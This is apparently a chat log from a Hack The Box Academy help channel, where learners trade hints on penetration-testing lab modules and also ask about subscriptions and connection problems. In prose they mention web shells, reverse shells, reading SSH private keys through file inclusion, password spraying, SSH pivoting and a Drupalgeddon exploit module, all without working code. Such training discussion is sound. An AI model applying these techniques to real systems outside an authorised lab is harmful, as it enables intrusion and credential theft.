[05:54:59:807] [16301:16302] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[05:54:59:807] [16301:16302] [ERROR][com.freerdp.core] - failed to connect to 10.129.33.10

nova pivot
#

Quick question: Why are the other plans "not available" ?

acoustic owl
#

What other plans? There are only two annual subscriptions.

dark jay
#

hello, i am doing LFI and FILE uploads module, i got the web shell but i cannot see the flag at /flag.txt and i also cannot pull the reverse shell what do i do? maybe its because cat /flag.txt has the spaces in it

civic inlet
#

Will htb make tracks for the other exams aswell?

rare condor
weary crow
#

Then

rare condor
weary crow
rare condor
weary crow
#

What module is that

grim gust
#

I am doing the cpts exam, but I am loosing connection a lot.
I already switched regions.
Are there any other people with stability issues ?

dark jay
#

Good luck bro i have no idea

spice spindle
#

Hey I am stuck at Skills Assessment - SQL Injection Fundamentals not able to figure out the webroot location of this. I have read the nginx config file but , could not find the webroot folder location. A nudge would be helpful. I have also tried readin access.log, error.log, even .ssh/id_rsa but no results there. Stuck on exactly which file to check here.

odd zenith
#

guys password attacks module section password spraying ...etc, any tips?

#

im stuck there

brave field
odd zenith
#

ohhhh

zealous hearth
#

Can someone help me with the skill assessment for file inclusion ? I am having a hard time identifying the the vulnerabilities

tight mesa
#

Hi there, anyone who is doing or has done Security Misconfiguration chapter from API Attacks module, willing to share a hint more than the endpoint!!!

random turtle
#

Can anyone help me with public exploits, I literally do not understand what I'm supposed to do. Question is simple "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)" But how do I search up exploits for an IP adress?

cloud urchin
random turtle
digital pendant
#

Enumeration is the answer, enumerate the target, what services can you see from the page source, from Wappalyzer (install this extension if you haven't already got it). Build a picture of what technology is in use then search for vulnerabilities for this. Plugins and Themes in Wordpress are easy targets for exploits, research which ones are in use.

cloud urchin
tight mesa
#

HTB Forum is not able to interactions, anyone willing to share a hint for Security Misconfiguration chapter from API Attacks, will be appreciated

mental canopy
fathom pendant
sacred ermine
#

guys I think there is an error for the
module Active Directory BloodHound
Skills Assessment

Q3: Which Azure user has a path to add himself as Global Administrator?

the answer must be: S***
but its not accepting it, can anyone confirm?

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SMB - When I try to get the password for Jason, using the provided password list in the resources section with crackmapexec and hydra, neither work. I get messages saying password authentication is not allowed, only publickey. Is there something I'm missing?

fathom pendant
fathom pendant
# crimson moon ?

this section is just theory; unless you've already done the module and returned to it to attempt pivoting

crimson moon
#

yes the lab challenge can't seem to wrap my head around of gaining revshell

fathom pendant
#

if that's the case; try one of the passwords supplied in the module for windows hosts

#

but you can entirely skip the challenge, it's really not gonna hurt

crimson moon
#

i have used proxychains with that creds but it can't establish a connection with the win host. I have already enabled dynamic port fwding but the session times out

#

actually i skipped this whole module and suffered really bad at AD enum skills assessment

fathom pendant
#

q1 asks about the ip assigned to the jump host you're provided with
q2 asks a very generic question
neither require you to complete a pivot

crimson moon
#

Remote/Reverse Port Forwarding with SSH
"In addition to answering the challenge questions, practice this technique and try to obtain a reverse shell from the Windows target."

im trying this ^

yes exactly this isn't in the challenge questions just to understand the technique that's mentioned in the theory

fathom pendant
#

you can practice it on other labs if you want

crimson moon
#

okay ๐Ÿ˜„

fathom pendant
#

fun fact: the labs in this module don't require you to use one strict method

scenic swallow
#

has anyone experienced bad network latency with the either the target machines or pwnboxes lately?

crimson moon
#

nope

hexed oyster
#

I'm struggling with "API Attacks -> Broken Authentication". From the reading: "An API suffers from Broken Authentication if any of its authentication mechanisms can be bypassed" and then goes on to show how to brute force the password with just the API. Then it goes on to say "Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email...". I was looking through the APIs provided and I found the ones to issue the OTP, and the one to reset the password, I've been fuzzing those in various combinations with no luck. Am I missing something?

brave field
violet lotus
#

i have a question. so far i have completed 81% of CWES modules. i have to cancel my subscription for some reason. if i cancel, will my progress stays as it is and will i have access to all those modules that i have completed or they go back to 0? also i am in between a module(file inclusion) and completed it almost 70% will i have access to this module or not after i cancel subscription

#

sorry for my worst english

fathom pendant
violet lotus
#

so that means file inclusion module will left out.

fathom pendant
#

that i'm not sure of, you'll have to reach out to support to confirm/deny

violet lotus
#

thanks for replying. i will try my best to complete it before canceling.

#

๐Ÿซก

mint topaz
#

I am facing the same problem how did you solve it

Edit i found it thanks

sage mica
#

Hi im working on the 'Pass the Certificate' module, and I kept encountering the same issue with running evil-winrm even though i have already updated the krb5.conf to include inlanefreight.local. Anyone can assist me with this, appreciate the help

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'

Error: Exiting with code 1

waxen totem
#

again, my bad, just realized it was a starting point box, #starting-point sorry ๐Ÿ˜…

rigid shadow
#

Hi, I am doing the Attacking Common Applications -> Attacking Drupal module. The end of module assessment asks the question:
"Work through all of the examples in this section and gain RCE multiple ways via the various Drupal instances on the target host." - on one of the hosts, it didn't seem possible to ||install a module|| - is that correct? (as in I couldn't actually find the option in the admin menu). Secondly, when trying to use ||drupalgeddon3 (which I had to write it to the dir with all metasploit modules in it, reload_all and then I could see it, configure it but when I hit exploit, it didn't exploit it ...|| did others experience this?) - I've answered the question, but just curious if others had the same experience?

woven zenith
dapper wadi
#

Hi, I am on the PENTEST IN A NUTSHELL module, Windows System Enumeration. When I run WinPEAS it just hangs in PowerShell and doesn't produce the output shown, is anyone else having this problem?

spice void
#

guys im stuck in this section can anyone help me out .. DM me

sacred ermine
#

guys I think there is an error for the
module Active Directory BloodHound
Skills Assessment

Q3: Which Azure user has a path to add himself as Global Administrator?

the answer must be: S***
but its not accepting it, can anyone confirm?

still relevant

#

anyone who has completed please confirm it

#

the funny part is that I have tried every single Azure user at this point, so I geniunely think there is a problem with it

nova pivot
acoustic owl
nova pivot
acoustic owl
nova pivot
#

Thank you!

#

^ Reference

acoustic owl
acoustic owl
nova pivot
# acoustic owl

Well, looks like when we have an active subscription it doesn't work ?

#

Monthly are not available either

acoustic owl
nova pivot
nova pivot
#

But not on the beta version it would seem

#

For some reason

slender tapir
#

General question on modules, if I decide to go back and redo a module, is there a way to clear the answers out of the questions at the foot of each section?

acoustic owl
sacred ermine
sacred ermine
#

Alright, thanks!
need to ask support at this point

acoustic owl
#

I completed the module a long time ago. Back then, there was only the legacy version of BloodHound.

#

This allowed you to see the path from the user to Global Administrator

#

I still need to work through the module with the CE version.

sacred ermine
#

Confused that BH might be the problem

acoustic owl
#

You cannot enter the data yourself, but must download it. Were you able to import it into CE without any problems?